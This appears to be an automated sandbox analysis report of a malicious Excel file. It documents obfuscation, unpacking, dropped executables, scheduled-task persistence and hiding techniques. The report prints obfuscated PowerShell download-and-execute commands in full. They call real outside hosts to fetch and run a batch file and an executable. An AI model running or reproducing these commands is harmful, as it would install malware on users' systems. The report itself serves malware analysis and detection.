Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2105935712.0000000002740000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122976252.0000000002840000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101619089.00000000028E0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2153192487.00000000029B0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Unpacked PE file: 31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Unpacked PE file: 37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Unpacked PE file: 31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Unpacked PE file: 37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack
.NET source code contains potential unpacker
Source: sp.exe.23.dr, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: gUuYfpYBjYgU.exe.24.dr, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.sp.exe.bb0000.2.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.2.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 28.2.sp.exe.bb0000.2.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 28.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 28_2_004F2AA7
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E6C16 push ecx; ret 24_2_004E6C2C
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_009817AF pushad ; iretd 24_2_009817B5
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00682156 push ecx; ret 28_2_00682169
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006B08FC push eax; ret 28_2_006B091A
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006B099C push ecx; ret 28_2_006B09AC
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0068118E push ecx; ret 28_2_006811A1
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0042BBAE push eax; ret 28_2_0042BBAF
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_000B650A push ecx; retf 31_2_000B650D
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_000B60CC pushfd ; iretd 31_2_000B60D0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_000B4AD5 push edx; retf 31_2_000B4AF2
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048780D push ebx; retf 31_2_0048780E
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00482B7A pushfd ; iretd 31_2_00482B7B
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F6AC61 push ebx; iretd 31_2_01F6AC62
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 34_2_000B650A push ecx; retf 34_2_000B650D
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 34_2_000B60CC pushfd ; iretd 34_2_000B60D0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 34_2_000B4AD5 push edx; retf 34_2_000B4AF2
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_0023650A push ecx; retf 37_2_0023650D
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_002360CC pushfd ; iretd 37_2_002360D0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_00234AD5 push edx; retf 37_2_00234AF2
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A780D push ebx; retf 37_2_001A780E
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A2B7A pushfd ; iretd 37_2_001A2B7B
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003EAC61 push ebx; iretd 37_2_003EAC62
Source: initial sample Static PE information: section name: .text entropy: 7.53751279368

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Drops PE files
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\sp.exe
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe File created: C:\Users\user\AppData\Roaming\JrekdQ.exe
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Roaming\gUuYfpYBjYgU.exe
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe File opened: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
